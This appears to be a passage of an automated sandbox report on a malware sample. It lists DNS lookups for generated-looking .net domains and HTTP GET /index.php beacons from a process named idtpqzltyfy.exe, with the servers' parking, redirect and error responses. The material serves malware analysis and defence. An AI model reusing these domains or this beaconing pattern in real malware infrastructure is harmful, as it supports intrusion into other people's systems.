                                                                                                                                                                                                          Aug 5, 2024 16:23:22.307908058 CEST1.1.1.1192.168.2.70x581bName error (3)smoketrust.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.318873882 CEST1.1.1.1192.168.2.70xc380Name error (3)partyhonor.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.333545923 CEST1.1.1.1192.168.2.70xaee2Name error (3)fighthonor.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.348253965 CEST1.1.1.1192.168.2.70x94a9Name error (3)partyneither.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.364134073 CEST1.1.1.1192.168.2.70xfd7bName error (3)fightneither.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.527837992 CEST1.1.1.1192.168.2.70xf73bName error (3)partysystem.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.575617075 CEST1.1.1.1192.168.2.70x4c8bName error (3)partytrust.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.586731911 CEST1.1.1.1192.168.2.70x68dcName error (3)fighttrust.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.602020025 CEST1.1.1.1192.168.2.70x5cb1Name error (3)freshlaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.852274895 CEST1.1.1.1192.168.2.70x2b38Name error (3)experiencelaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.882518053 CEST1.1.1.1192.168.2.70x6bceNo error (0)freshfancy.net81.169.145.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.785722971 CEST1.1.1.1192.168.2.70xca35Name error (3)experiencefancy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.031197071 CEST1.1.1.1192.168.2.70x3affName error (3)freshconsider.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.276823997 CEST1.1.1.1192.168.2.70xcd72Name error (3)experienceconsider.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.289036989 CEST1.1.1.1192.168.2.70xf72fName error (3)freshfriend.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.538819075 CEST1.1.1.1192.168.2.70xa8f4Name error (3)experiencefriend.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.549678087 CEST1.1.1.1192.168.2.70x2a4cName error (3)gentlemanlaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.718214989 CEST1.1.1.1192.168.2.70xdebeName error (3)alreadylaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.981952906 CEST1.1.1.1192.168.2.70xa304Name error (3)gentlemanfancy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.994797945 CEST1.1.1.1192.168.2.70xad30Name error (3)alreadyfancy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.008431911 CEST1.1.1.1192.168.2.70x4323Name error (3)gentlemanconsider.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.019424915 CEST1.1.1.1192.168.2.70xb373Name error (3)alreadyconsider.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.272799015 CEST1.1.1.1192.168.2.70x1406Name error (3)gentlemanfriend.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.603921890 CEST1.1.1.1192.168.2.70xce48No error (0)alreadyfriend.net15.197.192.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.173346996 CEST1.1.1.1192.168.2.70xcccfName error (3)followlaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.184062004 CEST1.1.1.1192.168.2.70x5336Name error (3)memberlaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.427146912 CEST1.1.1.1192.168.2.70x7589Name error (3)followfancy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.439620018 CEST1.1.1.1192.168.2.70xe3c1Name error (3)memberfancy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.458301067 CEST1.1.1.1192.168.2.70x88cbName error (3)followconsider.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.470509052 CEST1.1.1.1192.168.2.70x75b7Name error (3)memberconsider.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.942564964 CEST1.1.1.1192.168.2.70xbdadNo error (0)followfriend.net188.225.40.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.891237020 CEST1.1.1.1192.168.2.70x1fb5Name error (3)memberfriend.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.903814077 CEST1.1.1.1192.168.2.70x33bdName error (3)beginlaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.914954901 CEST1.1.1.1192.168.2.70xf139Name error (3)knownlaughter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:19.342288017 CEST1.1.1.1192.168.2.70x5c47Name error (3)fightgeneral.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:20.593597889 CEST1.1.1.1192.168.2.70x83c2Name error (3)partyinclude.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:21.624454021 CEST1.1.1.1192.168.2.70xafd8Name error (3)fightinclude.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:22.656313896 CEST1.1.1.1192.168.2.70x7ea5Name error (3)partynorth.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:23.691430092 CEST1.1.1.1192.168.2.70xf4d0Name error (3)fightnorth.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:24.714538097 CEST1.1.1.1192.168.2.70xaf5cName error (3)freshbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:25.730051994 CEST1.1.1.1192.168.2.70xd700Name error (3)experiencebranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:26.745863914 CEST1.1.1.1192.168.2.70xe137Name error (3)freshbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:27.762432098 CEST1.1.1.1192.168.2.70x66f0Name error (3)experiencebelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:29.008287907 CEST1.1.1.1192.168.2.70xdb1aName error (3)freshreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:30.028261900 CEST1.1.1.1192.168.2.70xc187Name error (3)experiencereceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:31.274490118 CEST1.1.1.1192.168.2.70x5c0cName error (3)freshquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:32.644752026 CEST1.1.1.1192.168.2.70x2692Name error (3)experiencequarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:33.900650978 CEST1.1.1.1192.168.2.70x51d1Name error (3)gentlemanbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:34.919079065 CEST1.1.1.1192.168.2.70xaa78Name error (3)alreadybranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:36.160528898 CEST1.1.1.1192.168.2.70xb06aName error (3)gentlemanbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:37.414206982 CEST1.1.1.1192.168.2.70x9d5cName error (3)alreadybelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:38.432774067 CEST1.1.1.1192.168.2.70x82e4Name error (3)gentlemanreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:39.679007053 CEST1.1.1.1192.168.2.70x2386Name error (3)alreadyreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:40.700752974 CEST1.1.1.1192.168.2.70xe78fName error (3)gentlemanquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:41.714907885 CEST1.1.1.1192.168.2.70xcf58Name error (3)alreadyquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:42.730444908 CEST1.1.1.1192.168.2.70x2d4fName error (3)followbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:43.746114969 CEST1.1.1.1192.168.2.70x3267Name error (3)memberbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:44.764403105 CEST1.1.1.1192.168.2.70x3987Name error (3)followbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:45.778937101 CEST1.1.1.1192.168.2.70x560dName error (3)memberbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:47.033505917 CEST1.1.1.1192.168.2.70xc023Name error (3)followreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:49.808259010 CEST1.1.1.1192.168.2.70x4a36Name error (3)followquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:50.952276945 CEST1.1.1.1192.168.2.70x56e9Name error (3)memberquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:51.980510950 CEST1.1.1.1192.168.2.70x4074Name error (3)beginbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:52.995425940 CEST1.1.1.1192.168.2.70x53e1Name error (3)knownbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:54.220349073 CEST1.1.1.1192.168.2.70xc849Name error (3)beginbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:55.169265985 CEST1.1.1.1192.168.2.70x4c7eName error (3)knownbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.089919090 CEST1.1.1.1192.168.2.70x1fb0Name error (3)beginreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.982188940 CEST1.1.1.1192.168.2.70xeab3Name error (3)knownreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:58.484996080 CEST1.1.1.1192.168.2.70x1b9eName error (3)beginquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.447949886 CEST1.1.1.1192.168.2.70x29baName error (3)knownquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.459800959 CEST1.1.1.1192.168.2.70xddacName error (3)summerbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.473557949 CEST1.1.1.1192.168.2.70x1534Name error (3)crowdbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.484698057 CEST1.1.1.1192.168.2.70xac3cName error (3)summerbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.497405052 CEST1.1.1.1192.168.2.70x3733Name error (3)crowdbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.509195089 CEST1.1.1.1192.168.2.70x720aName error (3)summerreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.670346975 CEST1.1.1.1192.168.2.70xa86cName error (3)crowdreceive.netnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • partygeneral.net
                                                                                                                                                                                                          • memberreceive.net
                                                                                                                                                                                                          • thoughtbranch.net
                                                                                                                                                                                                          • womanbelieve.net
                                                                                                                                                                                                          • partybelieve.net
                                                                                                                                                                                                          • membersystem.net
                                                                                                                                                                                                          • membertrust.net
                                                                                                                                                                                                          • crowdtrust.net
                                                                                                                                                                                                          • thoughtsystem.net
                                                                                                                                                                                                          • watersystem.net
                                                                                                                                                                                                          • womanhonor.net
                                                                                                                                                                                                          • freshfancy.net
                                                                                                                                                                                                          • alreadyfriend.net
                                                                                                                                                                                                          • followfriend.net

                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.7497003.33.130.190803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.012031078 CEST83OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: partygeneral.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.467889071 CEST254INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:00 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.74970135.164.78.200803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.497464895 CEST84OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: memberreceive.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.262451887 CEST382INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:03 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=210c7a536f0059a732bdffc00e0c9edb|8.46.123.33|1722867783|1722867783|0|1|0; path=/; domain=.memberreceive.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.74970234.246.200.160803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.088696003 CEST84OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: thoughtbranch.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.847978115 CEST382INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:07 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=efa534bb5cc2dc5e9eb4f651311bf733|8.46.123.33|1722867787|1722867787|0|1|0; path=/; domain=.thoughtbranch.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.74970315.197.142.173803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.695300102 CEST83OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: womanbelieve.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.183926105 CEST266INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                          Server: awselb/2.0
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:09 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 118
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.74970415.197.192.55803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.598023891 CEST83OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: partybelieve.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.119362116 CEST254INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          5192.168.2.74970885.13.130.3803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.325212002 CEST83OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: membersystem.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.975238085 CEST452INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:13 GMT
                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                          Location: https://all-inkl.com/index.php
                                                                                                                                                                                                          Content-Length: 238
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 2d 69 6e 6b 6c 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://all-inkl.com/index.php">here</a>.</p></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.7497093.33.130.190803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.259835958 CEST82OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: membertrust.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.771369934 CEST254INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:14 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          7192.168.2.749712170.187.200.48803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.599848986 CEST81OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: crowdtrust.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.110980034 CEST289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:17 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          8192.168.2.749713213.171.195.105803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.755304098 CEST84OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: thoughtsystem.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628709078 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.20.1
                                                                                                                                                                                                          date: Mon, 05 Aug 2024 14:23:18 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 2873
                                                                                                                                                                                                          last-modified: Tue, 16 Jul 2024 11:33:23 GMT
                                                                                                                                                                                                          etag: "66965a83-b39"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 63 73 73 2f 69 6e 64 65 78 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 66 61 73 [TRUNCATED]
